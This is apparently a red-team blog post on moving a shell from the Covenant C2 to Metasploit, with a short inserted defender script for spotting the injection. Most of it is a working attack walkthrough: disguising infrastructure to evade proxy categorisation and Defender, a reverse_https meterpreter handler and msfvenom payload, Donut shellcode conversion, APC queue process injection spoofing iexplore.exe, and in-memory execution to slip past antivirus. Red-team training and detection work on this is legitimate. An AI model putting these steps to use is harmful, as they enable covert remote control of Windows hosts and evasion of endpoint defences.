Introduction

You might be wondering why I needed to move a shell (a grunt) from Covenant to Metasploit (msf).

There are a couple of reasons, including:

  • It is open source and actively developed.
  • It supports large testing networks by making use of CIDR identifiers.
  • It offers smart payload generation and a payload switching mechanism.
  • It has more exploits.
  • It offers recursive download of files.

I will divide this post into two parts. Part one covers starting Metasploit with a valid certificate and part two covers passing a shell to msf.

Part One

Starting Metasploit with a valid certificate

The first step is to make sure that you start Metasploit with a valid certificate.

This step is very important as it will make sure your payload is not flagged by Defender.

Step 1

Domain Categorization

We will use a tool called Chameleon, which assists red teams in categorising their infrastructure under arbitrary categories.

Currently, the tool supports arbitrary categorisation for Bluecoat, McAfee Trustedsource and IBM X-Force.

Installation:

git clone https://github.com/mdsecactivebreach/Chameleon.git 
cd Chameleon/  
chmod +x chameleon.py

Usage:

Checking the category of your website against all supported proxies.

python3 chameleon.py --proxy a --check --domain DOMAIN.COM

[chameleon.png]

Check on VirusTotal whether your domain is clean, i.e. whether it is flagged for phishing or malicious purposes.

[virustotal.png]

You can also check whether it is blacklisted on MXToolBox.

[mxtoolbox.png]

Step 2

Domains and DNS Configuration

We need to set up the DNS records. Log in to Namecheap, select Domain List and choose a domain name.

[namecheap.png]

Then select Manage, click the Advanced DNS tab and start populating the various fields.

Create two A records (@ and www) that point to your mail server’s IP address.

[Arecord98.png]

Test your DNS propagation using the A option on DNS Checker.

[dnsArecord.png]

Step 3

HTTPS Certificate

We need to generate an HTTPS certificate for our msf handler. We are going to use Let's Encrypt. Make sure you generate a certificate for DOMAIN.COM.

Install certbot

sudo apt-get install certbot python3-certbot-apache

[cerbot1.png]

This obtains the certificate only (certonly), without changing the Apache configuration.

sudo certbot certonly --apache --agree-tos --register-unsafely-without-email -d <Domain name>

[certbot2.png]

Restart the server.

reboot

Verify that you have an HTTPS certificate on your domain name.

[certbot4.png]

Step 4

Install Metasploit

I used the Nightly Installers wiki page to install msf.

[msf.png]

We then have to merge cert.pem and privkey.pem into one PEM file that the handler will use as its HTTPS certificate.

sudo cat /etc/letsencrypt/live/domainName.com/cert.pem /etc/letsencrypt/live/domainName.com/privkey.pem > domainName.pem

[https.png]

Step 5

Start Metasploit

We are going to start Metasploit with this command:

msfconsole

[startmsf.png]

We'll use the multi/handler exploit and populate the following options:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST <IP>
set LPORT <PORT>
set HandlerSSLCert /home/t4tul4/Software/t4tul4.pem

[msf4.png]

Step 6

Process Injection

Generate an msf payload using msfvenom:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<IP> LPORT=<PORT> -f exe > msfHttps.exe

[msfvenom.png]

Then convert the malicious exe to shellcode using Donut

./donut -a2 msfHttps.exe -o msfHttps.bin

[donut.png]

After generating the payload we need to transfer it to the host where it will run, so we serve it over HTTP:

python3 -m http.server 8000

Execute the APC Queue Process Injection technique.

Process injection is a widespread defense evasion technique employed often within malware and fileless adversary tradecraft, and entails running custom code within the address space of another process.

It improves stealth and some techniques also achieve persistence.

I used the ProcessInjection tool by 3xpl01tc0d3r, which you can download from here.

I used the fourth technique, APC Queue.

An asynchronous procedure call (APC) is a function that executes asynchronously in the context of a particular thread.

When an APC is queued to a thread, the system issues a software interrupt. The next time the thread is scheduled, it will run the APC function.

I modified the code a bit and merged the parameters into the code.

Something to note: the options I used were /f:base64 and /t:4, and I spoofed iexplore.exe.

Execute the payload

.\ProcessInjection.exe

In Process Hacker we can verify that the payload spawned iexplore.exe.

Note: Always make sure that Automatic submission is off.

[Matokeo.png]

On msf we get a shell.

[matokeo1.png]
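As an added defender-side example (not part of the original post), the observables this step produces, a new iexplore.exe with an unusual parent, a handle to it with memory-write rights, and then outbound traffic from it, can be scored from Sysmon-style events. The events, the tool path and the parent allowlist below are constructed assumptions, not captured telemetry.

```python
# Constructed Sysmon-style events (not real telemetry); field names follow Sysmon's
# ProcessCreate (1), NetworkConnect (3) and ProcessAccess (10) schemas.
IE = r"C:\Program Files\Internet Explorer\iexplore.exe"
INJ = r"C:\Users\user\Desktop\ProcessInjection.exe"  # assumed location of the injector
EVENTS = [
    {"EventID": 1, "ProcessId": 4120, "Image": IE, "ParentImage": INJ},
    {"EventID": 10, "SourceImage": INJ, "TargetProcessId": 4120, "TargetImage": IE,
     "GrantedAccess": "0x1FFFFF"},
    {"EventID": 3, "ProcessId": 4120, "Image": IE,
     "DestinationIp": "203.0.113.10", "DestinationPort": 8443},
    # Benign control: iexplore.exe launched normally and browsing over HTTPS
    {"EventID": 1, "ProcessId": 5000, "Image": IE, "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "ProcessId": 5000, "Image": IE,
     "DestinationIp": "198.51.100.7", "DestinationPort": 443},
]

# Windows process access rights needed to write a payload into another process
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
WRITE_MASK = PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Parents from which iexplore.exe is normally launched (assumed allowlist)
EXPECTED_PARENTS = {"explorer.exe", "iexplore.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def score_events(events):
    """Return {pid: [reasons]} for iexplore.exe instances showing the injection pattern."""
    findings = {}

    def flag(pid, reason):
        findings.setdefault(pid, []).append(reason)

    for e in events:
        eid = e["EventID"]
        if eid == 1 and basename(e["Image"]) == "iexplore.exe" \
                and basename(e["ParentImage"]) not in EXPECTED_PARENTS:
            flag(e["ProcessId"], f"unexpected parent {basename(e['ParentImage'])}")
        elif eid == 10 and basename(e["TargetImage"]) == "iexplore.exe":
            access = int(e["GrantedAccess"], 16)
            if access & WRITE_MASK == WRITE_MASK and basename(e["SourceImage"]) != "iexplore.exe":
                flag(e["TargetProcessId"], f"memory-write handle 0x{access:x} from {basename(e['SourceImage'])}")
        elif eid == 3 and e["ProcessId"] in findings:
            # Network activity only raises the score of an already-suspicious instance
            flag(e["ProcessId"], f"outbound to {e['DestinationIp']}:{e['DestinationPort']}")
    return findings
```

The benign instance (pid 5000) produces no finding, so the parent and handle checks, not the network connection alone, carry the signal.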

Part Two

Passing a shell from Covenant to Metasploit

Step 1

Start Metasploit.

msfconsole

[msf4.png]

Step 2

Generate a grunt in covenant.

[pass2.png]

Step 3

Interact with your grunt and click on the Task tab.

Choose Assembly as the GruntTask.

This option executes our exe in memory, which is an additional layer of opsec as the AVs won't detect it.

Add your exe under the Choose File option.

Input any name in the AssemblyName field.

If your exe takes parameters, enter them in the Parameters section.

Click on Task to execute.

[pass3.png]

Step 4

Results

In Covenant

[cov1.png]

In Metasploit

[cov2.png]

Conclusion

This shows how one can move shells from one C2 to another. It's an important skill as it also acts as a backup if one C2 gets burned. I hope you learned something from this short blog. In case of any questions feel free to DM me. Happy Hacking!

Special Thanks

Special thanks to Truneski and Gabriel for reviewing my post.

References

  1. https://thevivi.net/

  2. https://3xpl01tc0d3r.blogspot.com/2019/12/process-injection-part-v.html

  3. https://github.com/3xpl01tc0d3r/ProcessInjection